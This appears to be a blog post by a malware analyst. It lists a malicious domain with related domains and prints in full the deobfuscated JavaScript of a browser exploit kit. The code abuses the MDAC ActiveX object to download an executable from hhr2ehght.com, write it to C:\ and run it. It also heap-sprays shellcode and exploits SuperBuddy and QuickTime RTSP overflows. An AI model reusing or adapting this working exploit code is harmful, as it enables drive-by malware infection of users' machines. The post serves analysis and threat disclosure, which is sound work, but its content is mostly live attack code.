hhr2ehght.com/cgi-bin/index.cgi?mentat

Another malicious domain. Other domains that resolve to same IP addresses are

  • aykjfgves.com
  • bkgpfgves.com
  • busyfgves.com
  • dmiafgves.com
  • faj4ehght.com
  • gfdpves.com
  • hwh2ght.com
  • iwi5fgves.com

After decoding through all the obfuscated JS, the result is as follows:

function C6v5phSX(j77jHqSx)
{
var oc_BNXRW = "abcdefghiklmnopqrstuvwxyz0123456789";
var NqQGG_DK = '';
for (var VkTuCgOU=0; VkTuCgOU<j77jHqSx; VkTuCgOU++) {
var EJiBajEW = Math.floor(Math.random() * oc_BNXRW.length);
NqQGG_DK += oc_BNXRW.substring(EJiBajEW, EJiBajEW+1);
}

return NqQGG_DK;
}

function nhF95ggb(y0_xpFSO, cl5GFOBF)
{
var e5JkKGLv = null;
var FwZ7TC6m = 'e5JkKGLv=y0_xpFSO.';
var kBZ6XrGB = new Array(
'CreateObject(cl5GFOBF)',
'CreateObject(cl5GFOBF, "")',
'CreateObject(cl5GFOBF, "", "")',
'GetObject("", cl5GFOBF)',
'GetObject(cl5GFOBF, "")',
'GetObject(cl5GFOBF)'
);

var AKEfb1ki=0;

while(!e5JkKGLv && AKEfb1ki < kBZ6XrGB.length) {
try {
eval(FwZ7TC6m+kBZ6XrGB[AKEfb1ki]);
} catch(e) { }

AKEfb1ki++;
}

return e5JkKGLv;
}

function TG1sjYUg(SJxyPXTM, AOowwO_Y)
{

try {
SJxyPXTM.open("GET", AOowwO_Y, false);
SJxyPXTM.send(null);

} catch(e) { return 0; }

return SJxyPXTM.responseBody;
}

function KieZ8MGb(HkhWGaSf, Q2RHKRuF, gzYwvXyt)
{

try {
HkhWGaSf.Type = 1;
HkhWGaSf.Mode = 3;
HkhWGaSf.Open();
HkhWGaSf.Write(gzYwvXyt);
HkhWGaSf.SaveToFile(Q2RHKRuF, 2);
HkhWGaSf.Close();
} catch(e) { return 0; }

return 1;
}

function SYvN4dUb(NdhWqtKB, SJxyPXTM, HkhWGaSf, Zy7W1vBo, L_uBnbvS)
{
var Og_Gb_YY = 0;
var AnZ1BTbf = TG1sjYUg(SJxyPXTM, NdhWqtKB);

if (AnZ1BTbf != 0) {
var bW8QW__e = "c:\\"+C6v5phSX(6)+".exe";

if (KieZ8MGb(HkhWGaSf, bW8QW__e, AnZ1BTbf) == 1) {
if (L_uBnbvS == 0) {
try {
Zy7W1vBo.Run(bW8QW__e, 0);
Og_Gb_YY = 1;
} catch(e) { }
} else {
try {
Zy7W1vBo.ShellExecute(bW8QW__e, "", "", "open", 0);
Og_Gb_YY = 1;
} catch(e) { }
}
}
}

return Og_Gb_YY;
}

function yTTEd2kT()
{
var xRWj5NGK = 0;
var AH7UTZwx = 1;
var AkJeAG2v = "http://hhr2ehght.com/cgi-bin/index.cgi?ff317aee0100f06002f7f5ea65060000000002b7ad2b550002040900000000020";
var ctoobgsG = new Array(null, null, null);

try {
var wP34Rhxr = 0;
var pdFNqmUw = document.createElement("object");
pdFNqmUw.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");

if (pdFNqmUw) {
ctoobgsG[0] = nhF95ggb(pdFNqmUw, "msxml2.XMLHTTP");
if (!ctoobgsG[0])
ctoobgsG[0] = nhF95ggb(pdFNqmUw, "Microsoft.XMLHTTP");

if (!ctoobgsG[0])
ctoobgsG[0] = nhF95ggb(pdFNqmUw, "MSXML2.ServerXMLHTTP");

ctoobgsG[1] = nhF95ggb(pdFNqmUw, "ADODB.Stream");

ctoobgsG[2] = nhF95ggb(pdFNqmUw, "WScript.Shell");

if (!ctoobgsG[2]) {
ctoobgsG[2] = nhF95ggb(pdFNqmUw, "Shell.Application");
if (ctoobgsG[2]) wP34Rhxr = 1;
}
}

if (ctoobgsG[0] && ctoobgsG[1] && ctoobgsG[2]) {
for(var maApDNpL=0;maApDNpL<AH7UTZwx;maApDNpL++) {
var jwOMpHKx = SYvN4dUb(AkJeAG2v+maApDNpL.toString(), ctoobgsG[0], ctoobgsG[1], ctoobgsG[2], wP34Rhxr);

if (!xRWj5NGK)
xRWj5NGK = jwOMpHKx;
}
}

} catch(e) {}

return xRWj5NGK;
}

function fXNZKHCv(YyJyCoZl, CGoWNZCa)
{
try {

var t7EpCn8v = new Date();
t7EpCn8v.setDate(t7EpCn8v.getDate() + 120000);

if (YyJyCoZl) {
document.cookie =
"id=" + YyJyCoZl +
"; path=/" +
"; expires=" + t7EpCn8v.toGMTString();
}

if (CGoWNZCa) {
document.cookie =
"addt=" + CGoWNZCa +
"; path=/" +
"; expires=" + t7EpCn8v.toGMTString();
}

} catch(e) {
}
}

var rjnbcVWi = new Array();
var TLJFLY3j = 0;

function cRptI8eT()
{
rjnbcVWi = rjnbcVWi;
setTimeout(cRptI8eT, 100);
}

function BhC9PuAe(fGQW2WpI, axv_tc2J)
{
while (fGQW2WpI.length*2<axv_tc2J)
fGQW2WpI += fGQW2WpI;

fGQW2WpI = fGQW2WpI.substring(0,axv_tc2J/2);
return fGQW2WpI;
}

function z5UkPTPx()
{
if (!TLJFLY3j) {
var Imbda2fQ = 0x0c0c0c0c;
var vfsx2ajx = unescape("%u00e8%u0000%u5d00%uc583%ub914%u0190%u0000%ud2b0%u4530%u4500%u7549%uebf9%u4200%u4242%u4242%u4242%u3b42%ud22e%ud2d2%ub68d%ue273%ud2d2%uaad2%u59de%ude92%ua259%u7fce%uba59%u39da%u59db%ue692%u925f%u59ae%ueeba%u2559%ud6b8%u3a8b%ud25d%ud2d2%u2b30%ubdba%ud2bc%ubad2%ua0a7%ubfbe%u2d86%u59c4%u3a3a%ud2ab%ud2d2%u0559%u5295%ud2ed%u28a7%u8595%u5295%ud2ed%u28a7%u3d59%ue18d%u531b%ud63e%ud2d3%u59d2%u830e%u8180%ud6ba%ud2d3%u2dd2%ude84%u8b88%u8083%ud059%u9181%ue952%ua7d2%u5328%u2ea9%ub7fc%ub7aa%ud1a7%u3951%u5bda%u15d1%ud691%ub7fc%ub7aa%u9114%ud2da%u5889%ud613%u5ae2%ud297%u12e1%u8282%u8581%u2d82%uc284%u2a51%ua7d2%ub8d4%u81d3%u842d%u88d6%u518b%ud610%u5293%ud2e8%u66a7%u842d%u83da%u5984%ueea7%ua659%uaafc%u27d1%u5984%uf2a4%u27d1%u1be1%u939b%ud17f%ue117%udd09%uc26c%u04e8%udaa6%u1913%ud1df%u9208%u2339%ucde9%u35a7%u598c%uf68c%u0fd1%u59b4%u99de%u8c59%ud1ce%u590f%u59d6%u17d1%u8c79%u118b%u2d3a%u2d2c%u5c2d%udc9c%u4a3e%u582c%uacdc%u300a%ue1a1%u5818%ue489%ufdc8%ubfa2%u9181%ud2bf%ua6ba%ua2a6%ufde8%ubafd%ua0ba%ub7e0%ub5ba%ua6ba%ub1fc%ubfbd%ub1fd%ubbb5%ub0ff%ubcbb%ubbfd%ub6bc%uaab7%ub1fc%ubbb5%ub4ed%ue1b4%ue5e3%ub7b3%ue2b7%ue2e3%ub4e2%ue4e2%ue2e2%ub4e0%ub4e5%ub7e7%ue4b3%ue2e7%ue2e4%ue2e2%ue2e2%ue2e2%ue2e2%ub0e0%ub3e5%ue0b6%ue7b0%ue2e7%ue2e2%ue2e0%ue2e6%ue2eb%ue2e2%ue2e2%ue2e2%ue2e2%ue2ea%u00d2");
var A1GHCJ0I = 0x400000;
var Yv0fjrfS = vfsx2ajx.length * 2;
var axv_tc2J = A1GHCJ0I - (Yv0fjrfS+0x38);
var fGQW2WpI = unescape("%u0c0c%u0c0c");

fGQW2WpI = BhC9PuAe(fGQW2WpI,axv_tc2J);
var gqW1gRWx = (Imbda2fQ - 0x400000)/A1GHCJ0I;

for (var rDjzS8iO=0;rDjzS8iO<gqW1gRWx;rDjzS8iO++) {
rjnbcVWi[rDjzS8iO] = fGQW2WpI + vfsx2ajx;
}

TLJFLY3j = 1;
cRptI8eT();
}

return 0;
}

function aYDOf7kN() {

try {
var lKcQNr_i = new ActiveXObject('Sb.SuperBuddy');

if (lKcQNr_i) {
z5UkPTPx();
fXNZKHCv(9);
lKcQNr_i.LinkSBIcons(0x0c0c0c0c);
}
} catch(e) {
}

return 0;
}

function yWU2EXku()
{
try {
var EF8iSrGY = new ActiveXObject("QuickTime.QuickTime.4");

if (EF8iSrGY) {
z5UkPTPx();
var HRtvZlIp = "";
for(var cwfnrm_q=0;cwfnrm_q<200;cwfnrm_q++) {
HRtvZlIp += "AAAA";
}

HRtvZlIp += "AAA";

for(var cwfnrm_q=0;cwfnrm_q<3;cwfnrm_q++) {
HRtvZlIp += "\x0c\x0c\x0c\x0c";
}

var Xx88lxkG =
'<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="200" height="200">' +
'<param name="src" value="http://hhr2ehght.com/cgi-bin/index.cgi?ff317aee0100f06001f7f5ea65060000000002b7ad2b55000204090000000006">' +
'<param name="type" value="image/x-quicktime">' +
'<param name="autoplay" value="true">' +
'<param name="qtnext1" value="<rtsp://AXDOF:' + HRtvZlIp +
'>T<myself>">' +
'<param name="target" value="myself">' +
'</object>';

i44TB6HK = 0;
var Nj2qgprh = document.createElement("div");
Nj2qgprh.innerHTML = Xx88lxkG;
fXNZKHCv(6);
document.body.appendChild(Nj2qgprh);

}
} catch(e) {
}

return 0;
}
if (yTTEd2kT() || aYDOf7kN() || yWU2EXku()
) {
document.QvPNJ2gK = 'about:blank';
} else {
document.QvPNJ2gK = 'about:blank';
}

/*setTimeout(function() {
if (document.i44TB6HK && document.MNYpDkrw && document.DApIuZCX) {
setTimeout("window.location = '" + document.QvPNJ2gK + "';", 1000);
} else {
setTimeout(arguments.callee, 1000);
}
}, 1000);*/

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: